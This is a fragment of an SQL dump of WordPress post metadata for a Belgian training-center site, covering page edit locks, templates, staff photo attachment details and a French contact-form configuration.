(478, 205, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1618, 418, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471274:1\";}\";'),
(1617, 418, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(482, 206, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(483, 206, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874590:1\";}\";'),
(484, 206, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(485, 207, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(486, 207, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874595:1\";}\";'),
(487, 207, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1616, 417, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1615, 417, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1614, 417, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471209:1\";}\";'),
(1613, 417, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(494, 208, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(495, 208, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875136:1\";}\";'),
(496, 208, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(497, 209, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(498, 209, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875140:1\";}\";'),
(499, 209, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1612, 416, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1611, 416, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1610, 416, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471188:1\";}\";'),
(1609, 416, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(506, 210, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(507, 210, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875665:1\";}\";'),
(508, 210, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1608, 415, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1607, 415, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(512, 211, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(513, 211, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875741:1\";}\";'),
(514, 211, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(515, 212, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(516, 212, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875744:1\";}\";'),
(517, 212, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(518, 213, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(519, 213, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875791:1\";}\";'),
(520, 213, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(521, 214, '_edit_last', '2'),
(522, 214, '_edit_lock', '1379449550:2'),
(523, 215, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(524, 215, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372875905:1\";}\";'),
(525, 214, '_wp_page_template', 'default'),
(590, 232, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:31:\"2013/07/bertrand_bauwin-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"bertrand_bauwin-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:31:\"bertrand_bauwin-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1371661670;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";}}'),
(589, 232, '_wp_attached_file', '2013/07/bertrand_bauwin-pti.jpg'),
(535, 217, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(536, 217, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878126:1\";}\";'),
(537, 217, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(538, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(539, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878185:1\";}\";'),
(540, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(541, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(542, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878247:1\";}\";'),
(543, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(544, 219, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(545, 219, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878307:1\";}\";'),
(546, 219, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(547, 220, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(548, 220, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371396454:1\";}\";'),
(549, 220, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(550, 221, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(551, 221, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371395332:1\";}\";'),
(552, 221, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(553, 222, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(554, 222, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371390907:1\";}\";'),
(555, 222, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(556, 223, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(557, 223, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878067:1\";}\";'),
(558, 223, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(559, 224, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(560, 224, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371391117:1\";}\";'),
(561, 224, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(562, 225, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(563, 225, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878263:1\";}\";'),
(564, 225, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(565, 226, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(566, 226, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878525:1\";}\";'),
(567, 226, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(568, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(569, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878545:1\";}\";'),
(570, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(571, 227, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(572, 227, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878606:1\";}\";'),
(573, 227, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(574, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(575, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878621:1\";}\";'),
(576, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(577, 228, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(578, 228, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878682:1\";}\";'),
(579, 228, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(580, 229, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(581, 229, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878685:1\";}\";'),
(582, 229, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(583, 230, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(584, 230, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878742:1\";}\";'),
(585, 230, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(586, 231, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(587, 231, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878771:1\";}\";'),
(588, 231, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(591, 233, '_wp_attached_file', '2013/07/damien_pierrard-pti.jpg'),
(592, 233, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:31:\"2013/07/damien_pierrard-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"damien_pierrard-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:31:\"damien_pierrard-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1371745494;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";}}'),
(593, 234, '_wp_attached_file', '2013/07/guelor-pti.jpg'),
(594, 234, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:261;s:4:\"file\";s:22:\"2013/07/guelor-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"guelor-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:22:\"guelor-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:13:\"maxime devaux\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(595, 235, '_wp_attached_file', '2013/07/julie_pierrard-pti.jpg'),
(596, 235, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:30:\"2013/07/julie_pierrard-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"julie_pierrard-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:30:\"julie_pierrard-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:3.20000000000000017763568394002504646778106689453125;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1372353169;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"7.015\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";}}'),
(597, 236, '_wp_attached_file', '2013/07/julien_meulemans-pti.jpg'),
(598, 236, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:260;s:4:\"file\";s:32:\"2013/07/julien_meulemans-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"julien_meulemans-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:32:\"julien_meulemans-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1371838525;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";}}'),
(599, 237, '_wp_attached_file', '2013/07/mathieu_gille-pti.jpg'),
(600, 237, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:259;s:4:\"file\";s:29:\"2013/07/mathieu_gille-pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"mathieu_gille-pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:29:\"mathieu_gille-pti-200x224.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1372353078;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";}}'),
(601, 238, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(602, 238, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372879937:1\";}\";'),
(603, 238, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(604, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(605, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372879999:1\";}\";'),
(606, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(607, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(608, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880060:1\";}\";'),
(609, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(610, 239, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(611, 239, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880121:1\";}\";'),
(612, 239, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(613, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(614, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880132:1\";}\";'),
(615, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(616, 240, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(617, 240, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880193:1\";}\";'),
(618, 240, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(619, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(620, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880204:1\";}\";'),
(621, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(622, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(623, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880265:1\";}\";'),
(624, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(625, 241, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(626, 241, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880325:1\";}\";'),
(627, 241, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(628, 242, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(629, 242, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880328:1\";}\";'),
(630, 242, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(631, 243, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(632, 243, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880372:1\";}\";'),
(633, 243, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(634, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(635, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880396:1\";}\";'),
(636, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(637, 244, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(638, 244, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880457:1\";}\";'),
(639, 244, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(640, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(641, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880504:1\";}\";'),
(642, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(643, 245, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(644, 245, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880565:1\";}\";'),
(645, 245, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(646, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(647, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880573:1\";}\";'),
(648, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(649, 246, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(650, 246, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880634:1\";}\";'),
(651, 246, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(652, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(653, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880667:1\";}\";'),
(654, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(655, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(656, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880728:1\";}\";'),
(657, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(658, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(659, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880789:1\";}\";'),
(660, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(661, 247, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(662, 247, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880849:1\";}\";'),
(663, 247, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(664, 248, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(665, 248, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880864:1\";}\";'),
(666, 248, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(667, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(668, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372880983:1\";}\";'),
(669, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(670, 249, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(671, 249, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881043:1\";}\";'),
(672, 249, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(673, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(674, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881061:1\";}\";'),
(675, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(676, 250, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(677, 250, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881123:1\";}\";'),
(678, 250, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(679, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(680, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881142:1\";}\";'),
(681, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(682, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(683, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881204:1\";}\";'),
(684, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(685, 251, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(686, 251, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881264:1\";}\";'),
(687, 251, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(688, 252, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(689, 252, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881267:1\";}\";'),
(690, 252, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(691, 253, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(692, 253, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881319:1\";}\";'),
(693, 253, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(694, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(695, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881349:1\";}\";'),
(696, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(697, 254, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(698, 254, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881410:1\";}\";'),
(699, 254, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(700, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(701, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881481:1\";}\";'),
(702, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(703, 255, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(704, 255, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881541:1\";}\";'),
(705, 255, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(706, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(707, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881549:1\";}\";'),
(708, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(709, 256, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(710, 256, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881641:1\";}\";'),
(711, 256, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1606, 415, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471145:1\";}\";'),
(1605, 415, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(715, 257, '_form', '<p>Votre nom (obligatoire)<br />\n    [text* your-name] </p>\n\n<p>Votre email (obligatoire)<br />\n    [email* your-email] </p>\n\n<p>Sujet<br />\n    [text your-subject] </p>\n\n<p>Votre message<br />\n    [textarea your-message] </p>\n\n[captchac captcha-712]\n<p>Veuillez recopier les caractères ci-dessus<br />\n[captchar captcha-712]</p>\n\n<p>[submit \"Send\"]</p>'),
(716, 257, '_mail', 'a:7:{s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:192:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:25:\"juliepierrard@hotmail.com\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(717, 257, '_mail_2', 'a:8:{s:6:\"active\";b:1;s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:192:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:12:\"stv@otvr.net\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(718, 257, '_messages', 'a:21:{s:12:\"mail_sent_ok\";s:43:\"Your message was sent successfully. Thanks.\";s:12:\"mail_sent_ng\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:16:\"validation_error\";s:74:\"Validation errors occurred. Please confirm the fields and submit it again.\";s:4:\"spam\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:12:\"accept_terms\";s:35:\"Please accept the terms to proceed.\";s:16:\"invalid_required\";s:31:\"Please fill the required field.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:14:\"invalid_number\";s:28:\"Number format seems invalid.\";s:16:\"number_too_small\";s:25:\"This number is too small.\";s:16:\"number_too_large\";s:25:\"This number is too large.\";s:13:\"invalid_email\";s:28:\"Email address seems invalid.\";s:11:\"invalid_url\";s:18:\"URL seems invalid.\";s:11:\"invalid_tel\";s:31:\"Telephone number seems invalid.\";s:13:\"upload_failed\";s:22:\"Failed to upload file.\";s:24:\"upload_file_type_invalid\";s:30:\"This file type is not allowed.\";s:21:\"upload_file_too_large\";s:23:\"This file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"Failed to upload file. Error occurred.\";s:23:\"quiz_answer_not_correct\";s:27:\"Your answer is not correct.\";s:12:\"invalid_date\";s:26:\"Date format seems invalid.\";s:14:\"date_too_early\";s:23:\"This date is too early.\";s:13:\"date_too_late\";s:22:\"This date is too late.\";}'),
(719, 257, '_additional_settings', ''),
(720, 258, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(721, 258, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883153:1\";}\";'),
(722, 258, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(723, 259, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(724, 259, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883297:1\";}\";'),
